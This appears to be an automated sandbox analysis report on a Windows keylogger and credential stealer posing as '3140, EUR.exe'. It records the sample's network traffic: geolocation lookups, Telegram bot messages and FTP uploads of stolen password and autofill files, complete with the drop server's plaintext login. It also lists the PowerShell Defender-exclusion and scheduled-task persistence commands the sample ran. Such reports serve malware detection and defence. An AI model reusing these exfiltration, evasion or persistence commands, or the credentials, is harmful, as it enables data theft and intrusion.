65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-30 13:03:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49766	188.114.97.3	443	7180	C:\Users\user\Desktop\3140, EUR.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 13:03:28 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-09-30 13:03:28 UTC	678	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 13:03:28 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 17439 Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LesU2KGcw88YHphVXYU8WBmR1wknuJ9pac1ggqTq0JzVNiH30%2BcGUhkbHocaoT8qOt2H%2FGkZ86XEknJjmYi6gWTPIX1l%2FImgiqLDF3gUGLQVo1liV2ND4%2FkSOHvBUjGIPYupsyib"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cb469cccc364356-EWR
2024-09-30 13:03:28 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-30 13:03:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49768	149.154.167.220	443	7180	C:\Users\user\Desktop\3140, EUR.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 13:03:29 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724536%0D%0ADate%20and%20Time:%2001/10/2024%20/%2010:09:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20724536%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-09-30 13:03:29 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Mon, 30 Sep 2024 13:03:29 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-30 13:03:29 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49769	188.114.97.3	443	7552	C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 13:03:33 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-30 13:03:33 UTC	682	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 13:03:33 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 17444 Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0ItIkAikdSICVbpc%2FIjsqVnzQBYCd2u02ifFKapSwsRzxkZaKhW9wzCr6EJP30EeXQk5%2B8eOTVEhDPv4mndC0k1DzUxU4v67mepOUWmpzzk%2BXp7549gYc%2Bu3yLpLhxGBT%2BAU06R%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cb469eb586a43ac-EWR
2024-09-30 13:03:33 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-30 13:03:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49771	188.114.97.3	443	7552	C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 13:03:36 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-30 13:03:36 UTC	676	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 13:03:36 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 17447 Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=biNDPfZfn7q1MMzi6BKkN%2Bo4qBMGJvwcJBb6Tw2YowTXsOGEfCn7NntuZwXRHejc%2FPUnTF80dvJ5lrcmywOvAJ843%2BbzrLh4iDkDUe7Ms8d1YSRgagh2kwrX91c2eJxIy88jrjzO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cb469fbb99c78ed-EWR
2024-09-30 13:03:36 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-30 13:03:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49774	188.114.97.3	443	7552	C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 13:03:38 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-09-30 13:03:38 UTC	674	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 13:03:38 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 17449 Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NocIXgAWsLAhOrCJJTEZFyWh%2FDxgM7za5suGgbuTTxBNykYMqEbOM05R2oCmcL5JJZlE0pe9z4VUIVgtej2R8B%2BfPesrlh2WstnNBx9jd5x4FQBfwPMqvwT7TOdq6ttLzWDzEBL9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cb46a0b3f7e43aa-EWR
2024-09-30 13:03:38 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-30 13:03:38 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49776	188.114.97.3	443	7552	C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 13:03:40 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-09-30 13:03:40 UTC	674	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 13:03:40 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 17451 Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gFXJQW9EbE2XAy1FRABHzoIZ44i1T5QlDMR7kgRTLzxsw25RIIWgsNDfgWCIQlZWStBUhbrlJavgfzrspItAhwFCb48yret6apG7dLZBWB%2BlIXExvNSYNjO%2FP0tYdA0H1aGzXQo8"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cb46a169c504380-EWR
2024-09-30 13:03:40 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-30 13:03:40 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49777	149.154.167.220	443	7552	C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 13:03:41 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724536%0D%0ADate%20and%20Time:%2001/10/2024%20/%2015:48:32%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20724536%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-09-30 13:03:41 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Mon, 30 Sep 2024 13:03:41 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-30 13:03:41 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

FTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Sep 30, 2024 15:03:46.016311884 CEST	21	49778	45.143.99.52	192.168.2.4	220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 16:03. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 16:03. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 16:03. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 16:03. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
Sep 30, 2024 15:03:46.016669989 CEST	49778	21	192.168.2.4	45.143.99.52	USER humble@quicklyserv.com
Sep 30, 2024 15:03:46.239696026 CEST	21	49778	45.143.99.52	192.168.2.4	331 User humble@quicklyserv.com OK. Password required
Sep 30, 2024 15:03:46.252085924 CEST	49778	21	192.168.2.4	45.143.99.52	PASS omobolajijonze12345
Sep 30, 2024 15:03:46.557590961 CEST	21	49778	45.143.99.52	192.168.2.4	230 OK. Current restricted directory is /
Sep 30, 2024 15:03:46.787847042 CEST	21	49778	45.143.99.52	192.168.2.4	504 Unknown command
Sep 30, 2024 15:03:46.788162947 CEST	49778	21	192.168.2.4	45.143.99.52	PWD
Sep 30, 2024 15:03:47.012161016 CEST	21	49778	45.143.99.52	192.168.2.4	257 "/" is your current location
Sep 30, 2024 15:03:47.012475967 CEST	49778	21	192.168.2.4	45.143.99.52	TYPE I
Sep 30, 2024 15:03:47.236392021 CEST	21	49778	45.143.99.52	192.168.2.4	200 TYPE is now 8-bit binary
Sep 30, 2024 15:03:47.236560106 CEST	49778	21	192.168.2.4	45.143.99.52	PASV
Sep 30, 2024 15:03:47.460988045 CEST	21	49778	45.143.99.52	192.168.2.4	227 Entering Passive Mode (45,143,99,52,210,119)
Sep 30, 2024 15:03:47.466555119 CEST	49778	21	192.168.2.4	45.143.99.52	STOR 724536 - AutoFill ID - ZyiAEnXWZP942894092.txt
Sep 30, 2024 15:03:48.090451002 CEST	21	49778	45.143.99.52	192.168.2.4	150 Accepted data connection
Sep 30, 2024 15:03:48.314404011 CEST	21	49778	45.143.99.52	192.168.2.4	226-File successfully transferred 226-File successfully transferred226 0.226 seconds (measured here), 1.50 Kbytes per second
Sep 30, 2024 15:03:48.778403997 CEST	21	49780	45.143.99.52	192.168.2.4	220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 16:03. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 16:03. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 16:03. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 16:03. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
Sep 30, 2024 15:03:48.778809071 CEST	49780	21	192.168.2.4	45.143.99.52	USER humble@quicklyserv.com
Sep 30, 2024 15:03:48.996948004 CEST	21	49780	45.143.99.52	192.168.2.4	331 User humble@quicklyserv.com OK. Password required
Sep 30, 2024 15:03:48.997148991 CEST	49780	21	192.168.2.4	45.143.99.52	PASS omobolajijonze12345
Sep 30, 2024 15:03:49.243757963 CEST	21	49780	45.143.99.52	192.168.2.4	230 OK. Current restricted directory is /
Sep 30, 2024 15:03:49.471131086 CEST	21	49780	45.143.99.52	192.168.2.4	504 Unknown command
Sep 30, 2024 15:03:49.477092028 CEST	49780	21	192.168.2.4	45.143.99.52	PWD
Sep 30, 2024 15:03:49.694860935 CEST	21	49780	45.143.99.52	192.168.2.4	257 "/" is your current location
Sep 30, 2024 15:03:49.695204020 CEST	49780	21	192.168.2.4	45.143.99.52	TYPE I
Sep 30, 2024 15:03:49.916961908 CEST	21	49780	45.143.99.52	192.168.2.4	200 TYPE is now 8-bit binary
Sep 30, 2024 15:03:49.917089939 CEST	49780	21	192.168.2.4	45.143.99.52	PASV
Sep 30, 2024 15:03:50.136060953 CEST	21	49780	45.143.99.52	192.168.2.4	227 Entering Passive Mode (45,143,99,52,203,192)
Sep 30, 2024 15:03:50.141524076 CEST	49780	21	192.168.2.4	45.143.99.52	STOR 724536 - Passwords ID - ZyiAEnXWZP471134058.txt
Sep 30, 2024 15:03:50.742501974 CEST	21	49780	45.143.99.52	192.168.2.4	150 Accepted data connection
Sep 30, 2024 15:03:50.961141109 CEST	21	49780	45.143.99.52	192.168.2.4	226-File successfully transferred 226-File successfully transferred226 0.218 seconds (measured here), 1.53 Kbytes per second
Sep 30, 2024 15:04:00.043103933 CEST	49780	21	192.168.2.4	45.143.99.52	PASV
Sep 30, 2024 15:04:00.260845900 CEST	21	49780	45.143.99.52	192.168.2.4	227 Entering Passive Mode (45,143,99,52,212,192)
Sep 30, 2024 15:04:00.266684055 CEST	49780	21	192.168.2.4	45.143.99.52	STOR 724536 - AutoFill ID - ZyiAEnXWZP471134058.txt
Sep 30, 2024 15:04:01.029295921 CEST	21	49780	45.143.99.52	192.168.2.4	150 Accepted data connection
Sep 30, 2024 15:04:01.251184940 CEST	21	49780	45.143.99.52	192.168.2.4	226-File successfully transferred 226-File successfully transferred226 0.383 seconds (measured here), 0.89 Kbytes per second

Target ID:	0
Start time:	09:02:55
Start date:	30/09/2024
Path:	C:\Users\user\Desktop\3140, EUR.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\3140, EUR.exe"
Imagebase:	0x400000
File size:	815'104 bytes
MD5 hash:	332593AE1E0BA5A06370963C37BBBCEB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	09:03:01
Start date:	30/09/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3140, EUR.exe"
Imagebase:	0x280000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	09:03:01
Start date:	30/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	09:03:01
Start date:	30/09/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"
Imagebase:	0x280000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	09:03:01
Start date:	30/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	09:03:01
Start date:	30/09/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lkuPOyvaWlIu" /XML "C:\Users\user\AppData\Local\Temp\tmpE737.tmp"
Imagebase:	0xb80000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	09:03:01
Start date:	30/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	09:03:02
Start date:	30/09/2024
Path:	C:\Users\user\Desktop\3140, EUR.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\3140, EUR.exe"
Imagebase:	0xd20000
File size:	815'104 bytes
MD5 hash:	332593AE1E0BA5A06370963C37BBBCEB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000008.00000002.4122819893.000000000318E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.4122819893.0000000003011000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.4122819893.0000000003117000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.4119574462.000000000043E000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	09:03:03
Start date:	30/09/2024
Path:	C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe
Imagebase:	0x500000
File size:	815'104 bytes
MD5 hash:	332593AE1E0BA5A06370963C37BBBCEB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
